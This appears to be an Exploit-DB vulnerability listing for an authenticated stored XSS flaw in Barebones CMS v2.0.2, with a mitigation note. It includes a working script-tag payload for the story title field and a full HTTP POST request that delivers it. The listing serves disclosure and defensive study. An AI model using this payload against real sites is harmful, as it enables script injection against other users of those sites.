header-logo
Suggest Exploit
vendor:
Barebones CMS
by:
tmrswrr
N/A
CVSS
HIGH
Stored Cross-Site Scripting (XSS)
79
CWE
Product Name: Barebones CMS
Affected Version From: v2.0.2
Affected Version To: v2.0.2
Patch Exists: NO
Related CWE:
CPE: a:cubiclesoft:barebones_cms:2.0.2
Metasploit:
Other Scripts:
Platforms Tested:
2023

Barebones CMS v2.0.2 – Stored Cross-Site Scripting (XSS) (Authenticated)

An authenticated user can inject malicious JavaScript code in the title field of a new story, leading to stored cross-site scripting (XSS) vulnerability. This allows the attacker to execute arbitrary code in the context of the affected website's users.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to prevent the execution of malicious scripts. Additionally, user input should be sanitized to remove any potentially harmful code.
Source

Exploit-DB raw data:

# Exploit Title: Barebones CMS v2.0.2 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-06-03
# Exploit Author: tmrswrr
# Vendor Homepage: https://barebonescms.com/
# Software Link: https://github.com/cubiclesoft/barebones-cms/archive/master.zip
# Version: v2.0.2
# Tested : https://demo.barebonescms.com/


--- Description ---

1) Login admin panel and go to new story : 
https://demo.barebonescms.com/sessions/127.0.0.1/moors-sluses/admin/?action=addeditasset&type=story&sec_t=241bac393bb576b2538613a18de8c01184323540
2) Click edit button and  write your payload in the title field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button


POST /sessions/127.0.0.1/moors-sluses/admin/ HTTP/1.1
Host: demo.barebonescms.com
Cookie: PHPSESSID=81ecf7072ed639fa2fda1347883265a4
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 237
Origin: https://demo.barebonescms.com
Dnt: 1
Referer: https://demo.barebonescms.com/sessions/78.163.184.240/moors-sluses/admin/?action=addeditasset&id=1&type=story&lang=en-us&sec_t=241bac393bb576b2538613a18de8c01184323540
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

action=saveasset&id=1&revision=0&type=story&sec_t=a6adec1ffa60ca5adf4377df100719b952d3f596&lang=en-us&title=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&newtag=&publish_date=2023-06-03&publish_time=12%3A07+am&unpublish_date=&unpublish_time=